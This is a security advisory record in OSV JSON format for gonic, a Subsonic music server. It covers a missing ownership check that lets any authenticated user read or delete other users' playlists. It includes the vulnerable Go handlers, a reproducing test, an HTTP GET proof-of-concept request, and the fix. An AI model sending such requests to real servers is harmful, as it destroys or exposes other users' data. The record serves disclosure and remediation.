{"id":"GHSA-hmgp-w9jm-vp95","summary":"Subsonic API: any authenticated user can delete or read any other user's playlist (IDOR)","details":"## Summary\n\nIn gonic, the Subsonic API endpoints `/rest/deletePlaylist.view` and `/rest/getPlaylist.view` perform no per-resource authorization. Once authenticated as *any* user (admin or not), an attacker can:\n\n1. **Delete any playlist owned by any other user** (including admin) by passing its `id`.\n2. **Read the full contents** (name, comment, song list) of any other user's **private** (non-public) playlist by passing its `id`.\n\nThe Subsonic playlist `id` is `base64url(\"\u003cuserID\u003e/\u003cfilename\u003e.m3u\")`. Because filenames are user-supplied or time-derived and the `userID` is a small integer, IDs are guessable and frequently exposed (e.g. a previously-public playlist that was later made private still has the same ID).\n\nThis breaks the multi-user trust boundary of gonic: a low-privileged user can wipe an administrator's curated playlists, and a user can exfiltrate any private playlist they obtain an ID for.\n\n## Status\n\nThis was originally disclosed to the maintainer by email and has been **fixed in commit `6dd71e6a3c966867ef8c900d359a7df75789f410`** (`fix(subsonic): enforce playlist ownership on getPlaylist/deletePlaylist`, 2026-05-18). The fix has not yet been included in a tagged release; the latest tagged version `v0.20.1` is still vulnerable. Filing this advisory now that private vulnerability reporting is enabled on the repo, so the issue has a public record once the next release ships.\n\n## Vulnerable code (pre-fix, at `v0.20.1` / commit `37090aa7`)\n\n**Delete IDOR** — `server/ctrlsubsonic/handlers_playlist.go` lines 177-187:\n\n```go\nfunc (c *Controller) ServeDeletePlaylist(r *http.Request) *spec.Response {\n    params := r.Context().Value(CtxParams).(params.Params)\n    playlistID, err := params.GetFirstID(\"id\", \"playlistId\")\n    if err != nil {\n        return spec.NewError(10, \"please provide an `id` or `playlistId` parameter\")\n    }\n    if err := c.playlistStore.Delete(playlistIDDecode(playlistID)); err != nil {\n        return spec.NewError(0, \"delete playlist: %v\", err)\n    }\n    return spec.NewResponse()\n}\n```\n\nThe handler never loads the playlist to check `playlist.UserID == user.ID`. Compare to `ServeUpdatePlaylist` (same file, line 138) which *does* perform this check.\n\n**Read IDOR** — `server/ctrlsubsonic/handlers_playlist.go` lines 51-68:\n\n```go\nfunc (c *Controller) ServeGetPlaylist(r *http.Request) *spec.Response {\n    params := r.Context().Value(CtxParams).(params.Params)\n    playlistID, err := params.GetFirstID(\"id\", \"playlistId\")\n    if err != nil {\n        return spec.NewError(10, \"please provide an `id` parameter\")\n    }\n    playlist, err := c.playlistStore.Read(playlistIDDecode(playlistID))\n    if err != nil {\n        return spec.NewError(70, \"playlist with id %s not found\", playlistID)\n    }\n    // ... never checks playlist.UserID or playlist.IsPublic ...\n    sub.Playlist = rendered\n    return sub\n}\n```\n\nThe listing endpoint `ServeGetPlaylists` (line 38) correctly filters by `playlist.UserID != user.ID && !playlist.IsPublic`, but the singular `getPlaylist` did not.\n\n## Live PoC (passing Go test)\n\nA reproducer against the existing test fixture (`server/ctrlsubsonic`):\n\n```go\nfunc TestIDOR_DeleteOtherUsersPlaylist(t *testing.T) {\n    f := newFixture(t)\n    victimRelPath := filepath.Join(\"1\", \"victim-private.m3u\")\n    _ = f.contr.playlistStore.Write(victimRelPath, &playlistp.Playlist{\n        UserID: f.admin.ID, Name: \"victim-private\", IsPublic: false,\n        Items: []string{\"/music/foo.flac\"},\n    })\n    victimID := playlistIDEncode(victimRelPath).String()\n    // f.alt is a non-admin, non-owner user\n    body := f.query(t, f.contr.ServeDeletePlaylist, f.alt, url.Values{\"id\": {victimID}})\n    // Subsonic returns status=\"ok\" and the file is gone.\n}\n```\n\nTest output:\n\n```\n--- PASS: TestIDOR_ReadOtherUsersPrivatePlaylist (0.07s)\n--- PASS: TestIDOR_DeleteOtherUsersPlaylist (0.07s)\nPASS\nok  go.senan.xyz/gonic/server/ctrlsubsonic 0.730s\n```\n\n## Equivalent HTTP request\n\n```\nGET /rest/deletePlaylist.view?u=lowpriv&p=lowpriv&v=1&c=poc&f=json&id=cGwtMS1zaGFyZWQubTN1\n```\n\nResponse: `{\"subsonic-response\":{\"status\":\"ok\",\"version\":\"...\"}}` — playlist is gone.\n\n## Impact\n\n- **Integrity / Availability**: low-privileged users can delete any other user's playlists, including admin's curated lists. There is no undo.\n- **Confidentiality**: private playlists (including their comment fields) are readable by any authenticated user with an ID. IDs are predictable (`base64(\"\u003csmallUserID\u003e/\u003cname\u003e.m3u\")`) and previously-public IDs persist after being marked private.\n- **Trust boundary**: gonic supports multiple users (`createUser`, non-admin role). This bug collapsed the user-to-user authorization model.\n\n## Affected versions\n\nLatest tagged release `v0.20.1` and all prior versions back to when the playlist M3U store was introduced. Master HEAD is fixed at commit `6dd71e6a3c966867ef8c900d359a7df75789f410`.\n\n## Suggested patch (applied by maintainer in `6dd71e6`)\n\nLoad the playlist first and enforce ownership in both handlers:\n\n```go\n// ServeGetPlaylist\nif playlist.UserID != user.ID && !playlist.IsPublic {\n    return spec.NewError(50, \"you aren't allowed to read that user's playlist\")\n}\n\n// ServeDeletePlaylist\nif playlist.UserID != 0 && playlist.UserID != user.ID {\n    return spec.NewError(50, \"you aren't allowed to delete that user's playlist\")\n}\n```\n\nThis mirrors the existing ownership check already present in `ServeCreateOrUpdatePlaylist` (line 84) and `ServeUpdatePlaylist` (line 138).\n\n## Credits\n\nReported by Vishal Shukla ([@shukla304](https://github.com/shukla304) / [@therawdev](https://github.com/therawdev)).","aliases":["CVE-2026-49338","GO-2026-5830"],"modified":"2026-07-07T16:11:17.028935559Z","published":"2026-06-26T23:33:24Z","database_specific":{"severity":"HIGH","github_reviewed":true,"github_reviewed_at":"2026-06-26T23:33:24Z","nvd_published_at":"2026-06-19T19:16:36Z","cwe_ids":["CWE-285","CWE-639"]},"references":[{"type":"WEB","url":"https://github.com/sentriz/gonic/security/advisories/GHSA-hmgp-w9jm-vp95"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-49338"},{"type":"WEB","url":"https://github.com/sentriz/gonic/commit/6dd71e6"},{"type":"PACKAGE","url":"https://github.com/sentriz/gonic"}],"affected":[{"package":{"name":"go.senan.xyz/gonic","ecosystem":"Go","purl":"pkg:golang/go.senan.xyz/gonic"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"0.21.0"}]}],"database_specific":{"last_known_affected_version_range":"\u003c= 0.20.1","source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/06/GHSA-hmgp-w9jm-vp95/GHSA-hmgp-w9jm-vp95.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"}]}